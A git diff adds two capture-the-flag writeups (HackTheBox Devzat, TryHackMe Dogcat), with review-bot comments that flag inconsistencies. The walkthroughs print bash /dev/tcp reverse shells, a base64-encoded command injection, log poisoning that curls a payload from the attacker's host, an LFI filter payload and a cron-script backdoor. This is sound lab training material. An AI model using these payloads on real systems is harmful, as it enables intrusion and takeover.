b/content/writeup-ctf/writeup-devzat-htb/img/image-25.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fed1ef12432ae6a87ef7511adf9003ed331bf1e473f12472d4f74022d233448c +size 87171 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp new file mode 100644 index 0000000..f2f9069 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-25.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8fce0da7edd3db130a961543135503a958c269b1c8c3678dc2ef0bb46ba6950 +size 54872 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.png b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png new file mode 100644 index 0000000..14b4141 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-3.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:399b6a6ed8b9e5951dca98674afcdde9030696c2ee564cf8b4dd7e4a361d5ca6 +size 31624 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp new file mode 100644 index 0000000..da34d4a --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e597451e0f33cc0647f2e3d266721395ebc57058158de8e57320715b8e761e94 +size 29406 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.png b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png new file mode 100644 index 0000000..3eb814b --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d017e9e387f25cc50461ff915ffd5b58d5c95a79014a5df3dc44381d47a6e49 +size 31756 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp new file mode 100644 index 0000000..949b6e5 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:549ae04c6d83f21db0fcb9379a4911a393738140e18ad3288ba2b8a3ee669ab5 +size 55338 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.png b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png new file mode 100644 index 0000000..0e40623 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6af03fb670e13eb06015ea3bb8a545ac2be1feacd2eda8d0ac307e151bdc1266 +size 77999 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp new file mode 100644 index 0000000..54d572a --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-5.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2af9ce1232d1033bf6daf626ac924c57e1e397254a77687b92d9fdcf6d620c5b +size 53076 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.png b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png new file mode 100644 index 0000000..0c135e5 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e03eb0bd2ba5533425ad285d029c60d523eb6fbe71f0ede1b9dc31617d8d5a2 +size 54091 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp new file mode 100644 index 0000000..41ce839 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cff17375528b775737908e78f1afd8cc3b666073be1b52f2256c5e259360b641 +size 41722 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.png b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png new file mode 100644 index 0000000..11047ec --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dcd8cc512f224751f0489954f74d168225f86699d954f50d4a8ae26e449899b +size 97120 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp new file mode 100644 index 0000000..555270f --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a784eb3e3f336abe458c2e14769712f50dd6d0a5a89d6999c0b7efb84465283 +size 58324 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.png b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png new file mode 100644 index 0000000..2209e12 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a6b48886942acdc19569caaad21a7d28f33e00e830035fc863d412fc24f7bea +size 75020 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp new file mode 100644 index 0000000..5f964f3 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1075d130b2afb91b26a69becb0791e2b3e60f42bda5ec76cc1c056c578de65f0 +size 54224 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.png b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png new file mode 100644 index 0000000..dde00c3 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fd133f931d2d00d2031d7fb34508400d41b211d583542f7ba2f9391e486acfd +size 7894 diff --git a/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp new file mode 100644 index 0000000..a2e00be --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9c7113a4dbc290638d6ab88992721445a0576be7daae5b80ef8d5ce2f6f14cd +size 6450 diff --git a/content/writeup-ctf/writeup-devzat-htb/index.md b/content/writeup-ctf/writeup-devzat-htb/index.md new file mode 100644 index 0000000..a031604 --- /dev/null +++ b/content/writeup-ctf/writeup-devzat-htb/index.md 
@@ -0,0 +1,207 @@ +--- +title: "Writeup - Devzat (HTB)" +date: 2022-03-15 +slug: "writeup-devzat-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Devzat](https://app.hackthebox.com/machines/Devzat) machine from  the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.118 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 8000/tcp : SSH + +I add the domain to the /etc/hosts file: + + +```bash +10.10.11.118 devzat.htb +``` +I then access the site via a browser: + +![](img/image-2.webp) + +## Exploit + +After looking at the site I notice that a shell command is given as an example at the bottom of the page: + + +```bash +ssh -l [user_name] devzat.htb -p 8000 +``` +This command connects to the application hosted on port 8000. + +![](img/image-3.webp) + +This application is an interactive chat with a number of commands available: + +![](img/image-4.webp) + +Nothing particular for the moment. I make a directory scan on the site. For that I use "ffuf" with the wordlist [common.txt](http://ffuf.me/wordlists). + + +```bash +ffuf -c -u http://devzat.htb/FUZZ -w Documents/commun.txt +``` +![](img/image-5.webp) + +Several folders but quite classic one. Now let's scan the subdomains: + + +```bash +ffuf -c -u http://devzat.htb -w Documents/sub.txt -H "Host: FUZZ.devzat.htb" -fw 18 +``` +![](img/image-6.webp) + +A subdomain is found ! I add it in the /etc/hosts file then I go to the site : + +![](img/image-7.webp) + +It is a web page with a formulary to add pets. Now let's scan the folders for this subdomain. + +![](img/image-8.webp) + +This is a git project with a number of files. 
+ +![](img/image-9.webp) + +I will download the projects with the following command: + + +```bash +wget -r -np -R "index.html*" http://pets.devzat.htb/.git +``` +I first check the last commit to see if any files have been modified or deleted: + +![](img/image-10.webp) + +And indeed a large number of files have been deleted, so I will restore the last commit with the following command: + + +```bash +git checkout -- . +``` +![](img/image-11.webp) + +Now that we have the complete tree, let's start the code analysis. Let's start with main.go. + +I find in this file, a function related to the loading of the character of the pet animal. This function takes as argument the species. It then executes a "sh" command which retrieves the content of one of the files contained in the "characteristics" folder. We will be able to use this function to execute some code. + +![](img/image-12.webp) + +For that I make a classic request that I intersperse with Burp. + +![](img/image-13.webp) + +Then I modify the value of "species" to insert my code. I test at first a classical reverse shell, but without success. + +![](img/image-14.webp) + +Let's try to convert our command to Base64 to ensure that there is no modification before execution on the target machine. + +[Reverse Shells - Pentest Book](https://pentestbook.six2dez.com/exploitation/reverse-shells) + +For that I use the following command to encode my reverse shell command in base64. + + +```bash +echo "bash -i >& /dev/tcp/10.10.16.2/1234 0>&1" | base64 +``` +Then I transmit the following order in the form. + + +```bash +echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMQo=' | base64 -d | bash +``` +Bingo, I am now connected as Patrick. + +![](img/image-15.webp) + +No change it's not this user who has the first flag. I will have to find a way to change the user. To start, I'll run the [linPeas](http://linpeas.sh) script to get an overview of the machine. 
+ +The first thing that catches my attention is the number of open ports. + +![](img/image-16.webp) + +Indeed there are a number of ports open only locally on the machine. So I will do an ssh port forwarding. + + +```bash +ssh -L 8086:127.0.0.1:8086 -N patrick@10.10.11.118 +``` +I can then perform an nmap scan on my local address to identify the service running on port 8086. + +![](img/image-17.webp) + +It is the InfluxDB service in version 1.7.5 that runs on this port. Let's look for an exploit... + +After some research I found the CVE-2019-20933. It is an exploit that allows to get an admin access to the database without using a password. I use the following script: + +{{< github repo="LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933" >}} + +I will now be able to search for information in the different databases. At first I look for the registered users : + +![](img/image-19.webp) + +I find the user "catherine" with her password. This is a very good news, indeed it is her who has the first flag. + +![](img/image-20.webp) + +I connect with ssh, then I get the flag. + +## Privilege escalation + +In the linPeas scan result I also noticed that a "devchat" service was running with patrick rights. It looks like a test version running on port 8443 in parallel with the production version. + + +```bash +catherine@devzat:~/dev/dev$ ps aux | grep dev +[...] +patrick 839 0.0 0.5 1085916 11904 ? Sl 12:28 0:00 ./devchat +[...] +``` +I also found backup files related to this same service: + +![](img/image-21.webp) + +These are files belonging to catherine, good news I will be able to recover them and analyze them to find an exploit. + +In the file "commands.go", I quickly find that the command /file uses a password to work. And this password is clearly indicated. + +![](img/image-22.webp) + +Ok let's try the different things we discovered. + +I log back in as patrick, then start a local SSH session on 8443. 
+ +![](img/image-23.webp) + +Let's try to read a root file with the command /file and with the password found previously. I test with the file id\_rsa of the user root. + +![](img/image-24.webp) + +It works! So now I can connect as root with ssh. Then get the last flag. + +![](img/image-25.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave .git accessible on a website +- Do not use shell commands in functions used by forms accessible on a web site +- Do not store non-hasher passwords in a database +- Update InfluxDB +- Do not run the chat bot with root privileges diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png new file mode 100644 index 0000000..c995304 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c537e42185f47b0030de10d9a4e55d61ed17a9f3183748cd9a7929e3fffaa729 +size 36714 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp new file mode 100644 index 0000000..7010d0d --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd2f41ce8a5db7c98db516e42cc459943190b2211853b404b6330fa0d692238d +size 35514 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png new file mode 100644 index 0000000..5ad0a48 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb6aff75e49f9b6ea869b9b268c822957a870918ec8e5c5953c49e9a6b71c0f2 +size 23289 
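Review bot: In content/writeup-ctf/writeup-devzat-htb/index.md, the Privilege escalation section contradicts itself about which account the dev chat instance runs as: the text says the "devchat" service runs "with patrick rights" and the quoted `ps aux` line shows `patrick 839 ... ./devchat`, yet `/file` then returns root's `id_rsa` and the Recommendations end with "Do not run the chat bot with root privileges". State explicitly which process listens on 8443 and under which user, since the whole escalation depends on it. The Recommendations list also omits the finding that made that step possible, the `/file` password written in clear in `commands.go` inside backup files owned by catherine; add an item for it. Smaller fixes: `Documents/commun.txt` does not match the `common.txt` wordlist named in the sentence above it, "non-hasher passwords" should read "non-hashed", "intersperse with Burp" should read "intercept", and the images jump from `image-17.webp` to `image-19.webp`.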
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp new file mode 100644 index 0000000..b66e290 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b79dc9c19e3a2bcab18fad644001c3409f8d583f985ea08c917624fe2c76816f +size 9824 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png new file mode 100644 index 0000000..5576df5 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba66ebd4cb439e8c4955d7ba9f95243fe9fa2920c732dff1839e4c189209203a +size 80165 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp new file mode 100644 index 0000000..ffec38e --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b51c72dd0451545949d7b0121ecc3e8153e97c675fe6dc5c0eaafe2e45402d9 +size 74100 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png new file mode 100644 index 0000000..99d654d --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d03f3b22b5a3cb01aa64b3ac87ed16b3d4b52fa4fcd264e76d9404c3357772a +size 23323 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp new file mode 100644 index 0000000..9d01c0f --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b47d8191354140344becc1626a2ce0a20c732c817173718c70b9bc5f24118300 +size 27870 
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png new file mode 100644 index 0000000..f12961a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc129cd34f622d63efc12c8f31d111b083fd2ce698f6bf9321fa266b01c24229 +size 41689 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp new file mode 100644 index 0000000..2c1ae7a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2078f2d76ba091430f4ec8e2fe6a0dbb82b6c71df4aa3c89976e52479f939f29 +size 36090 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png new file mode 100644 index 0000000..72935ff --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:602120665ac19e728ba032a0299e8204bae06908ab50c936e1600984270c1767 +size 15887 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp new file mode 100644 index 0000000..869d321 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:785b31948744b4e4910114c1b3766249092b365bae26aa503813803957c2264c +size 15034 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png new file mode 100644 index 0000000..3df38d0 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7705333e8bff8b3e09b5921690a95aa71847809b1520b7a6da53bf0cf175d4c8 +size 3561 
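Review bot: The screenshots in this patch are committed twice through LFS, as `image-N.png` and `image-N.webp`, while the writeups only reference the `.webp` files (for example `![](img/image-4.webp)`); unless the site build needs the PNG originals, drop them from the commit. The conversion is also not always a saving: for writeup-dogcat-thm, `image-4.png` is 23323 bytes and `image-4.webp` is 27870 bytes, so check the WebP settings used for the small screenshots.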
diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp new file mode 100644 index 0000000..5e4784a --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dee0258433c1946f75ea17a024ced6b27a243ebac4911ad9e23ffb1dac49e2a0 +size 3924 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png new file mode 100644 index 0000000..a8bcc06 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:974e0be2e0f951c88474f6cd13b9f0c5bd4b8544322438ee264f2bb1d45c7991 +size 14703 diff --git a/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp new file mode 100644 index 0000000..c2f61e0 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4f8ba6a97c92572673e9862cc691c6e1bb5873789d4de1c42bfb45a699a1fd +size 12934 diff --git a/content/writeup-ctf/writeup-dogcat-thm/index.md b/content/writeup-ctf/writeup-dogcat-thm/index.md new file mode 100644 index 0000000..c9b1202 --- /dev/null +++ b/content/writeup-ctf/writeup-dogcat-thm/index.md 
@@ -0,0 +1,194 @@ +--- +title: "Writeup - Dogcat (THM)" +date: 2022-05-31 +slug: "writeup-dogcat-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Dogcat](https://tryhackme.com/room/dogcat) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.38) + +![](img/image-2.webp) + +## Exploit + +In a first step I start by making a scan of the website folders: + +![](img/image-3.webp) + +We find a page `cat.php`, it is surely the page which provides the random images of cat. With a little deduction I find a similar page: `dog.php`. + +I notice the use of an argument when I click on one of the buttons. So I try a Local-Remote File Inclusion, but without success. An error tells us that the options are: `dog` & `cat`. + +After some research I find the following page: [PHP Base64 Filter](https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/). These are techniques to bypass security checks for Local-Remote File Inclusion. I try the version using a PHP filter: + + +```bash +http://10.10.91.89/?view=php://filter/read=convert.base64-encode/resource=cat/../index +``` +I get the contents of the index file encoded in base64 : + + +```bash + + + + + dogcat + + + + +

dogcat

+ a gallery of various dogs or cats + +
+

What would you like to see?

+
+ +
+ + + +``` +I can also use the same principle to get the content of the `flag.php` flag. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d + +``` +Pour faire une injection de commande //TODO + +![](img/image-4.webp) + + +```bash +[11/May/2022:12:26:50 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=cat/../../../../etc/passwd&ext&test=id HTTP/1.1" 400 0 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data) " +``` + +```bash +http://10.10.91.89/?view=php://filter/resource=cat/../../../../../var/log/apache2/access.log&ext&test=curl%2010.8.3.186:80/reverse.php%20%3E%20reverse.php +``` +![](img/image-5.webp) + +I now have a reverse shell as `www-data`. + + +```bash +$ cd /var/www +$ ls +flag2_QMW7JvaY2LvK.txt +html +$ cat flag2_QMW7JvaY2LvK.txt +THM{LF1_t0_RC3_aec3fb} +``` +I can get the second flag. + +## Privilege escalation + +I start by checking the sudo permissions of my user : + +![](img/image-6.webp) + +I have the permission to run the `env` command as `root`. So I look on GTFObin to see if there is a possibility to launch a shell with this command: [env sudo](https://gtfobins.github.io/gtfobins/env/#sudo). + +With the following command I create a `root` shell. + +![](img/image-7.webp) + + +```bash +cd /root +ls +flag3.txt +cat flag3.txt +THM{D1ff3r3nt_3nv1ronments_874112} +``` +I can get the third flag. After some research I notice a `dockerenv` file. So we are in a docker and I will have to find a way to get out to get the last flag. + + +```bash +ls -la +total 80 +drwxr-xr-x 1 root root 4096 May 11 11:59 . +drwxr-xr-x 1 root root 4096 May 11 11:59 .. 
+-rwxr-xr-x 1 root root 0 May 11 11:59 .dockerenv +drwxr-xr-x 1 root root 4096 Feb 26 2020 bin +drwxr-xr-x 2 root root 4096 Feb 1 2020 boot +drwxr-xr-x 5 root root 340 May 11 11:59 dev +drwxr-xr-x 1 root root 4096 May 11 11:59 etc +drwxr-xr-x 2 root root 4096 Feb 1 2020 home +drwxr-xr-x 1 root root 4096 Feb 26 2020 lib +drwxr-xr-x 2 root root 4096 Feb 24 2020 lib64 +drwxr-xr-x 2 root root 4096 Feb 24 2020 media +drwxr-xr-x 2 root root 4096 Feb 24 2020 mnt +drwxr-xr-x 1 root root 4096 May 11 11:59 opt +dr-xr-xr-x 112 root root 0 May 11 11:59 proc +drwx------ 1 root root 4096 Mar 10 2020 root +drwxr-xr-x 1 root root 4096 Feb 26 2020 run +drwxr-xr-x 1 root root 4096 Feb 26 2020 sbin +drwxr-xr-x 2 root root 4096 Feb 24 2020 srv +dr-xr-xr-x 13 root root 0 May 11 11:59 sys +drwxrwxrwt 1 root root 4096 Mar 10 2020 tmp +drwxr-xr-x 1 root root 4096 Feb 24 2020 usr +drwxr-xr-x 1 root root 4096 Feb 26 2020 var +ls /otp +ls: cannot access '/otp': No such file or directory +ls /opt +backups +``` +In the `/opt` folder I find a `backups` file with the following content: + + +```bash +#!/bin/bash +tar cf /root/container/backup/backup.tar /root/container +``` +backup.shIt is most certainly a script that runs regularly with a CRON job. Knowing that I can write to the file, I add the following line: + + +```bash +echo "bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> backup.sh +``` +After a few seconds, I have a reverse shell as root but on the machine and not in a docker. + +![](img/image-8.webp) + +I can now recover the last flag. + + +```bash +# cat /root/flag4.txt +THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} +``` diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.png b/content/writeup-ctf/writeup-goodgames-htb/featured.png new file mode 100644 index 0000000..c8a79fd --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/featured.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93ad7743716d5a2111781d1693ed8dba44bcbf87c9dfcd21e3129812996f8898 +size 216815 diff --git a/content/writeup-ctf/writeup-goodgames-htb/featured.webp b/content/writeup-ctf/writeup-goodgames-htb/featured.webp new file mode 100644 index 0000000..ead7b47 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ecf6bb749e53274e4278deab7c934b40b46c02a13b2893c2a6571e89dbfaff3 +size 23672 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png new file mode 100644 index 0000000..bba9c09 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd4f81a0a34cc625e0bcf0dc64d6667f8ea72ff484f54d663741b61cbbb473cc +size 29623 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp new file mode 100644 index 0000000..2144e9e --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5e3dcdcc7000ed7a77ffd0e429d4a65a161426ddafd8eec502af81b39efcc07 +size 25288 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png new file mode 100644 index 0000000..11380df --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09b46e56b3b2b045c28cac337ef0892e8f741a1c04c817f51c28ac7aa35b8bcd +size 18157 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp new file mode 100644 index 0000000..1da70a1 --- /dev/null 
+++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fcace92c84da7c5fd0dcc8f031c18fde7c53c348fcd064fc5cddea2aa5f1d57 +size 24760 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png new file mode 100644 index 0000000..3cdac76 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6255c03d2f289deef4101cc0f019786417e15673e3e2e1d4a84c3bfce1910884 +size 2224574 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp new file mode 100644 index 0000000..a32b33e --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:025e2dab54af4d3a4681631daf38e3fdf3e36017103122734ac862cd92af07d7 +size 271744 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png new file mode 100644 index 0000000..8cd27c1 --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9656e1a97c547a3b65c0ee67429e6d98393123e7dbf41e25a4c184c391b4690b +size 63946 diff --git a/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp new file mode 100644 index 0000000..5c98b8c --- /dev/null +++ b/content/writeup-ctf/writeup-goodgames-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12cdeddfc582b0cf1d74bf5b6e166940cd040d250b62c181e75c499d2d6cdc72 +size 54056 
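Review bot: In content/writeup-ctf/writeup-dogcat-thm/index.md, the step that turns the file inclusion into command execution is left as an untranslated placeholder, `Pour faire une injection de commande //TODO`, so the access-log line and the `access.log` URL that follow it have no explanation. Write that paragraph in English or remove the placeholder before merging. The target address also changes from `10.10.11.146` in the nmap command to `10.10.91.89` in the URLs, the caption `backup.sh` is fused into the sentence "backup.shIt is most certainly ...", and the text calls `backups` a file in `/opt` while the content shown is the `backup.sh` script. Unlike the Devzat writeup, this one has no Recommendations section; add one covering the `view` parameter handling, the `sudo` rule on `env`, and the writable backup script.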
